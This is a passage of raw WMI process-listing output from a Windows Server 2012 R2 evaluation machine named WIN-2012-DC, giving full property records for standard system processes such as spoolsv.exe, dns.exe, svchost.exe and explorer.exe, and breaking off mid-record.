C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1416\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1416\"\nCaption : spoolsv.exe\nCommandLine : C:\\Windows\\System32\\spoolsv.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121450.375156-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : spoolsv.exe\nExecutablePath : C:\\Windows\\System32\\spoolsv.exe\nExecutionState :\nHandle : 1416\nHandleCount : 372\nInstallDate :\nKernelModeTime : 468750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : spoolsv.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 856\nOtherTransferCount : 33608\nPageFaults : 3104\nPageFileUsage : 3036\nParentProcessId : 440\nPeakPageFileUsage : 3424\nPeakVirtualSize : 74260480\nPeakWorkingSetSize : 8664\nPriority : 8\nPrivatePageCount : 3108864\nProcessId : 1416\nQuotaNonPagedPoolUsage : 20\nQuotaPagedPoolUsage : 153\nQuotaPeakNonPagedPoolUsage : 24\nQuotaPeakPagedPoolUsage : 158\nReadOperationCount : 3\nReadTransferCount : 1464\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 9\nUserModeTime : 468750\nVirtualSize : 72437760\nWindowsVersion : 6.3.9600\nWorkingSetSize : 2629632\nWriteOperationCount : 2\nWriteTransferCount : 320\nPSComputerName : WIN-2012-DC\nProcessName : spoolsv.exe\nHandles : 372\nVM : 72437760\nWS : 2629632\nPath : C:\\Windows\\System32\\spoolsv.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1368\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1368\"\nCaption : Microsoft.ActiveDirectory.WebServices.exe\nCommandLine : C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121450.413055-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : Microsoft.ActiveDirectory.WebServices.exe\nExecutablePath : C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\nExecutionState :\nHandle : 1368\nHandleCount : 347\nInstallDate :\nKernelModeTime : 1718750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : Microsoft.ActiveDirectory.WebServices.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 15655\nOtherTransferCount : 520054\nPageFaults : 33220\nPageFileUsage : 30536\nParentProcessId : 440\nPeakPageFileUsage : 33404\nPeakVirtualSize : 595652608\nPeakWorkingSetSize : 40372\nPriority : 8\nPrivatePageCount : 31268864\nProcessId : 1368\nQuotaNonPagedPoolUsage : 38\nQuotaPagedPoolUsage : 350\nQuotaPeakNonPagedPoolUsage : 45\nQuotaPeakPagedPoolUsage : 351\nReadOperationCount : 145\nReadTransferCount : 429485\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 10\nUserModeTime : 4218750\nVirtualSize : 592752640\nWindowsVersion : 6.3.9600\nWorkingSetSize : 7741440\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : Microsoft.ActiveDirectory.WebServices.exe\nHandles : 347\nVM : 592752640\nWS : 7741440\nPath : C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1408\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1408\"\nCaption : dfsrs.exe\nCommandLine : C:\\Windows\\system32\\DFSRs.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121450.696161-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : dfsrs.exe\nExecutablePath : C:\\Windows\\system32\\DFSRs.exe\nExecutionState :\nHandle : 1408\nHandleCount : 335\nInstallDate :\nKernelModeTime : 80781250\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : dfsrs.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 1123795\nOtherTransferCount : 204591110\nPageFaults : 22967\nPageFileUsage : 14024\nParentProcessId : 440\nPeakPageFileUsage : 16580\nPeakVirtualSize : 634163200\nPeakWorkingSetSize : 20244\nPriority : 8\nPrivatePageCount : 14360576\nProcessId : 1408\nQuotaNonPagedPoolUsage : 32\nQuotaPagedPoolUsage : 125\nQuotaPeakNonPagedPoolUsage : 35\nQuotaPeakPagedPoolUsage : 125\nReadOperationCount : 1814\nReadTransferCount : 11538526\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 15\nUserModeTime : 166406250\nVirtualSize : 632041472\nWindowsVersion : 6.3.9600\nWorkingSetSize : 8839168\nWriteOperationCount : 5850\nWriteTransferCount : 96397765\nPSComputerName : WIN-2012-DC\nProcessName : dfsrs.exe\nHandles : 335\nVM : 632041472\nWS : 8839168\nPath : C:\\Windows\\system32\\DFSRs.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1508\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1508\"\nCaption : dns.exe\nCommandLine : C:\\Windows\\system32\\dns.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121450.752362-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : dns.exe\nExecutablePath : C:\\Windows\\system32\\dns.exe\nExecutionState :\nHandle : 1508\nHandleCount : 10284\nInstallDate :\nKernelModeTime : 5156250\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : dns.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 49639\nOtherTransferCount : 1110789\nPageFaults : 28714\nPageFileUsage : 88328\nParentProcessId : 440\nPeakPageFileUsage : 89316\nPeakVirtualSize : 147890176\nPeakWorkingSetSize : 87164\nPriority : 8\nPrivatePageCount : 90447872\nProcessId : 1508\nQuotaNonPagedPoolUsage : 10076\nQuotaPagedPoolUsage : 1262\nQuotaPeakNonPagedPoolUsage : 10295\nQuotaPeakPagedPoolUsage : 1264\nReadOperationCount : 57\nReadTransferCount : 6612\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 12\nUserModeTime : 2343750\nVirtualSize : 145772544\nWindowsVersion : 6.3.9600\nWorkingSetSize : 6610944\nWriteOperationCount : 60\nWriteTransferCount : 9120\nPSComputerName : WIN-2012-DC\nProcessName : dns.exe\nHandles : 10284\nVM : 145772544\nWS : 6610944\nPath : C:\\Windows\\system32\\dns.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1548\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1548\"\nCaption : ismserv.exe\nCommandLine : C:\\Windows\\System32\\ismserv.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121450.809793-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : ismserv.exe\nExecutablePath : C:\\Windows\\System32\\ismserv.exe\nExecutionState :\nHandle : 1548\nHandleCount : 88\nInstallDate :\nKernelModeTime : 156250\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : ismserv.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 337\nOtherTransferCount : 6006\nPageFaults : 1422\nPageFileUsage : 1380\nParentProcessId : 440\nPeakPageFileUsage : 1640\nPeakVirtualSize : 29483008\nPeakWorkingSetSize : 4108\nPriority : 8\nPrivatePageCount : 1413120\nProcessId : 1548\nQuotaNonPagedPoolUsage : 11\nQuotaPagedPoolUsage : 39\nQuotaPeakNonPagedPoolUsage : 12\nQuotaPeakPagedPoolUsage : 39\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 6\nUserModeTime : 0\nVirtualSize : 26324992\nWindowsVersion : 6.3.9600\nWorkingSetSize : 839680\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : ismserv.exe\nHandles : 88\nVM : 26324992\nWS : 839680\nPath : C:\\Windows\\System32\\ismserv.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1700\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1700\"\nCaption : wlms.exe\nCommandLine : C:\\Windows\\system32\\wlms\\wlms.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121451.074083-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : wlms.exe\nExecutablePath : C:\\Windows\\system32\\wlms\\wlms.exe\nExecutionState :\nHandle : 1700\nHandleCount : 39\nInstallDate :\nKernelModeTime : 0\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : wlms.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 47\nOtherTransferCount : 178\nPageFaults : 1068\nPageFileUsage : 484\nParentProcessId : 440\nPeakPageFileUsage : 576\nPeakVirtualSize : 15691776\nPeakWorkingSetSize : 2620\nPriority : 8\nPrivatePageCount : 495616\nProcessId : 1700\nQuotaNonPagedPoolUsage : 4\nQuotaPagedPoolUsage : 29\nQuotaPeakNonPagedPoolUsage : 5\nQuotaPeakPagedPoolUsage : 29\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 2\nUserModeTime : 0\nVirtualSize : 14626816\nWindowsVersion : 6.3.9600\nWorkingSetSize : 1306624\nWriteOperationCount : 42\nWriteTransferCount : 1080\nPSComputerName : WIN-2012-DC\nProcessName : wlms.exe\nHandles : 39\nVM : 14626816\nWS : 1306624\nPath : C:\\Windows\\system32\\wlms\\wlms.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1708\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1708\"\nCaption : dfssvc.exe\nCommandLine : C:\\Windows\\system32\\dfssvc.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121451.112485-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : dfssvc.exe\nExecutablePath : C:\\Windows\\system32\\dfssvc.exe\nExecutionState :\nHandle : 1708\nHandleCount : 129\nInstallDate :\nKernelModeTime : 156250\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : dfssvc.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 421\nOtherTransferCount : 10160\nPageFaults : 2123\nPageFileUsage : 1912\nParentProcessId : 440\nPeakPageFileUsage : 2068\nPeakVirtualSize : 32190464\nPeakWorkingSetSize : 5000\nPriority : 8\nPrivatePageCount : 1957888\nProcessId : 1708\nQuotaNonPagedPoolUsage : 13\nQuotaPagedPoolUsage : 48\nQuotaPeakNonPagedPoolUsage : 15\nQuotaPeakPagedPoolUsage : 48\nReadOperationCount : 15\nReadTransferCount : 3374\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 11\nUserModeTime : 0\nVirtualSize : 30593024\nWindowsVersion : 6.3.9600\nWorkingSetSize : 2871296\nWriteOperationCount : 14\nWriteTransferCount : 6034\nPSComputerName : WIN-2012-DC\nProcessName : dfssvc.exe\nHandles : 129\nVM : 30593024\nWS : 2871296\nPath : C:\\Windows\\system32\\dfssvc.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1316\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1316\"\nCaption : vds.exe\nCommandLine : C:\\Windows\\System32\\vds.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121512.030634-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : vds.exe\nExecutablePath : C:\\Windows\\System32\\vds.exe\nExecutionState :\nHandle : 1316\nHandleCount : 158\nInstallDate :\nKernelModeTime : 625000\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : vds.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 841\nOtherTransferCount : 28175\nPageFaults : 2770\nPageFileUsage : 1772\nParentProcessId : 440\nPeakPageFileUsage : 2152\nPeakVirtualSize : 48394240\nPeakWorkingSetSize : 7856\nPriority : 8\nPrivatePageCount : 1814528\nProcessId : 1316\nQuotaNonPagedPoolUsage : 16\nQuotaPagedPoolUsage : 88\nQuotaPeakNonPagedPoolUsage : 19\nQuotaPeakPagedPoolUsage : 92\nReadOperationCount : 32\nReadTransferCount : 94208\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 11\nUserModeTime : 156250\nVirtualSize : 45608960\nWindowsVersion : 6.3.9600\nWorkingSetSize : 512000\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : vds.exe\nHandles : 158\nVM : 45608960\nWS : 512000\nPath : C:\\Windows\\System32\\vds.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1248\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1248\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\System32\\svchost.exe -k termsvcs\nCreationClassName : Win32_Process\nCreationDate : 20170712121512.705767-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\System32\\svchost.exe\nExecutionState :\nHandle : 1248\nHandleCount : 401\nInstallDate :\nKernelModeTime : 937500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 261\nOtherTransferCount : 808\nPageFaults : 3772\nPageFileUsage : 3432\nParentProcessId : 440\nPeakPageFileUsage : 3548\nPeakVirtualSize : 76869632\nPeakWorkingSetSize : 7380\nPriority : 8\nPrivatePageCount : 3514368\nProcessId : 1248\nQuotaNonPagedPoolUsage : 19\nQuotaPagedPoolUsage : 151\nQuotaPeakNonPagedPoolUsage : 19\nQuotaPeakPagedPoolUsage : 154\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 22\nUserModeTime : 781250\nVirtualSize : 75804672\nWindowsVersion : 6.3.9600\nWorkingSetSize : 2723840\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 401\nVM : 75804672\nWS : 2723840\nPath : C:\\Windows\\System32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1336\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1336\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k NetworkServiceNetworkRestricted\nCreationClassName : Win32_Process\nCreationDate : 20170712121512.750613-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 1336\nHandleCount : 107\nInstallDate :\nKernelModeTime : 1250000\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 1377\nOtherTransferCount : 71686\nPageFaults : 1988\nPageFileUsage : 1004\nParentProcessId : 440\nPeakPageFileUsage : 1204\nPeakVirtualSize : 22446080\nPeakWorkingSetSize : 4368\nPriority : 8\nPrivatePageCount : 1028096\nProcessId : 1336\nQuotaNonPagedPoolUsage : 11\nQuotaPagedPoolUsage : 46\nQuotaPeakNonPagedPoolUsage : 13\nQuotaPeakPagedPoolUsage : 46\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 3\nUserModeTime : 156250\nVirtualSize : 21381120\nWindowsVersion : 6.3.9600\nWorkingSetSize : 1564672\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 107\nVM : 21381120\nWS : 1564672\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"2060\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"2060\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted\nCreationClassName : Win32_Process\nCreationDate : 20170712121512.780955-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 2060\nHandleCount : 261\nInstallDate :\nKernelModeTime : 625000\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 1484\nOtherTransferCount : 33964\nPageFaults : 6573\nPageFileUsage : 7724\nParentProcessId : 440\nPeakPageFileUsage : 11332\nPeakVirtualSize : 1166675968\nPeakWorkingSetSize : 12516\nPriority : 8\nPrivatePageCount : 7909376\nProcessId : 2060\nQuotaNonPagedPoolUsage : 18\nQuotaPagedPoolUsage : 126\nQuotaPeakNonPagedPoolUsage : 19\nQuotaPeakPagedPoolUsage : 127\nReadOperationCount : 308\nReadTransferCount : 12500992\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 8\nUserModeTime : 0\nVirtualSize : 628494336\nWindowsVersion : 6.3.9600\nWorkingSetSize : 3321856\nWriteOperationCount : 296\nWriteTransferCount : 1810432\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 261\nVM : 628494336\nWS : 3321856\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"2600\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"2600\"\nCaption : msdtc.exe\nCommandLine : C:\\Windows\\System32\\msdtc.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121711.180176-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : msdtc.exe\nExecutablePath : C:\\Windows\\System32\\msdtc.exe\nExecutionState :\nHandle : 2600\nHandleCount : 158\nInstallDate :\nKernelModeTime : 0\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : msdtc.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 158\nOtherTransferCount : 274\nPageFaults : 2084\nPageFileUsage : 2312\nParentProcessId : 440\nPeakPageFileUsage : 2480\nPeakVirtualSize : 42795008\nPeakWorkingSetSize : 6812\nPriority : 8\nPrivatePageCount : 2367488\nProcessId : 2600\nQuotaNonPagedPoolUsage : 12\nQuotaPagedPoolUsage : 74\nQuotaPeakNonPagedPoolUsage : 13\nQuotaPeakPagedPoolUsage : 74\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 9\nUserModeTime : 0\nVirtualSize : 41689088\nWindowsVersion : 6.3.9600\nWorkingSetSize : 413696\nWriteOperationCount : 3\nWriteTransferCount : 1286144\nPSComputerName : WIN-2012-DC\nProcessName : msdtc.exe\nHandles : 158\nVM : 41689088\nWS : 413696\nPath : C:\\Windows\\System32\\msdtc.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"260\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"260\"\nCaption : taskhostex.exe\nCommandLine : taskhostex.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712145926.030215-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : taskhostex.exe\nExecutablePath : C:\\Windows\\system32\\taskhostex.exe\nExecutionState :\nHandle : 260\nHandleCount : 195\nInstallDate :\nKernelModeTime : 468750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : taskhostex.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 745\nOtherTransferCount : 10612\nPageFaults : 2471\nPageFileUsage : 2676\nParentProcessId : 868\nPeakPageFileUsage : 3172\nPeakVirtualSize : 232296448\nPeakWorkingSetSize : 7600\nPriority : 8\nPrivatePageCount : 2740224\nProcessId : 260\nQuotaNonPagedPoolUsage : 17\nQuotaPagedPoolUsage : 168\nQuotaPeakNonPagedPoolUsage : 21\nQuotaPeakPagedPoolUsage : 170\nReadOperationCount : 27\nReadTransferCount : 1724416\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 5\nUserModeTime : 156250\nVirtualSize : 230174720\nWindowsVersion : 6.3.9600\nWorkingSetSize : 7581696\nWriteOperationCount : 43\nWriteTransferCount : 835584\nPSComputerName : WIN-2012-DC\nProcessName : taskhostex.exe\nHandles : 195\nVM : 230174720\nWS : 7581696\nPath : C:\\Windows\\system32\\taskhostex.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1188\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1188\"\nCaption : explorer.exe\nCommandLine : C:\\Windows\\Explorer.EXE\nCreationClassName : Win32_Process\nCreationDate : 20170712145926.061690-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : explorer.exe\nExecutablePath : C:\\Windows\\Explorer.EXE\nExecutionState :\nHandle : 1188\nHandleCount : 1199\nInstallDate :\nKernelModeTime : 166875000\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : explorer.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 37916\nOtherTransferCount : 959574\nPageFaults : 147573\nPageFileUsage : 36700\nParentProcessId : 1860\nPeakPageFileUsage : 48264\nPeakVirtualSize : 588001280\nPeakWorkingSetSize : 91248\nPriority : 8\nPrivatePageCount : 37580800\nProcessId : 1188\nQuotaNonPagedPoolUsage : 66\nQuotaPagedPoolUsage : 1044\nQuotaPeakNonPagedPoolUsage : 95\nQuotaPeakPagedPoolUsage : 1189\nReadOperationCount : 2784\nReadTransferCount : 3005114\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 39\nUserModeTime : 78437500\nVirtualSize : 507023360\nWindowsVersion : 6.3.9600\nWorkingSetSize : 74444800\nWriteOperationCount : 151\nWriteTransferCount : 25552\nPSComputerName : WIN-2012-DC\nProcessName : explorer.exe\nHandles : 1199\nVM : 507023360\nWS : 74444800\nPath : C:\\Windows\\Explorer.EXE\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3492\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"3492\"\nCaption : VBoxTray.exe\nCommandLine : \"C:\\Windows\\System32\\VBoxTray.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712145937.014436-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : VBoxTray.exe\nExecutablePath : C:\\Windows\\System32\\VBoxTray.exe\nExecutionState :\nHandle : 3492\nHandleCount : 175\nInstallDate :\nKernelModeTime : 156250\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : VBoxTray.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 17572\nOtherTransferCount : 134264\nPageFaults : 7529\nPageFileUsage : 1680\nParentProcessId : 